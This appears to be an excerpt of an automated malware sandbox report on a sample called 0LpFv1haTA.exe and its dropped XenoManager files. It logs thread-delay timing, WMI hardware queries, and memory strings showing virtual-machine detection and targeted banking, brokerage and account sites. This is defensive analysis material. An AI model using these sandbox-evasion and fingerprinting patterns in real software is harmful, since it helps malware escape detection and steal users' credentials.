Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598312
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598203
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598093
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597933
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597812
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597702
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597593
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597480
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597363
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597234
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597124
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 573647
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\manager.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window / User API: threadDelayed 4962
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window / User API: threadDelayed 4872
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window / User API: threadDelayed 2411
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window / User API: threadDelayed 4730
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Window / User API: threadDelayed 6624
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Window / User API: threadDelayed 3231
Source: C:\Users\user\Desktop\0LpFv1haTA.exe TID: 5236 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -25825441703193356s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -599762s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -599649s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -599422s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -599313s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -599188s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -599078s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -598969s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -598844s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -598725s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -598625s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -598516s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -598406s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -598297s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -598187s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -598078s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -597969s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -597844s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -597731s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -597625s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -597516s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -597406s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -597296s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -597187s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -597076s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -596969s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -596857s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -596738s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -596624s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -596500s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -596391s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -596281s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -596172s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -596062s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -595953s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -595844s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -595719s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -595609s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 3852 Thread sleep time: -595500s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 4668 Thread sleep count: 2411 > 30
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 4668 Thread sleep count: 4730 > 30
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -598997s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -598875s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -598765s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -598651s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -598531s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -598421s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -598312s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -598203s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -598093s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -597933s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -597812s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -597702s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -597593s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -597480s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -597363s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -597234s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -597124s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 7312 Thread sleep time: -573647s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5084 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7236 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 8036 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 8044 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\manager.exe TID: 8092 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe TID: 8164 Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe TID: 1576 Thread sleep count: 6624 > 30
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe TID: 6196 Thread sleep count: 3231 > 30
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe TID: 4072 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 5696 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 183684 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe TID: 344684 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\OpenSSH\ssh.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\OpenSSH\ssh.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599762
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599649
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599078
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598969
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598844
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598725
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598625
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598516
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598406
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598297
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598187
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598078
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597844
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597731
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597516
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597296
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597187
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597076
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596969
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596857
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596738
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596624
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596391
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596172
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595953
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595844
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595719
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595609
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 595500
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598997
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598651
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598421
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598312
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598203
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 598093
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597933
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597812
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597702
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597593
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597480
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597363
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597234
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 597124
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 573647
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\manager.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Thread delayed: delay time: 922337203685477
Source: Amcache.hve.36.dr Binary or memory string: VMware
Source: 0LpFv1haTA.exe, 0000000D.00000002.2439788315.000001E4481F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=@
Source: 0LpFv1haTA.exe, 00000000.00000002.2104891776.0000019457E92000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[o
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 0LpFv1haTA.exe, 0000002E.00000002.3230872411.000001B2AF9D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll''g
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.36.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 0LpFv1haTA.exe, 00000007.00000002.4565048036.0000021F0F6EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.36.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.36.dr Binary or memory string: vmci.sys
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.36.dr Binary or memory string: VMware20,1
Source: Amcache.hve.36.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.36.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.36.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.36.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.36.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.36.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.36.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.36.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.36.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: ssh.exe, 0000001F.00000002.4563063171.000001E39F239000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
Source: Amcache.hve.36.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
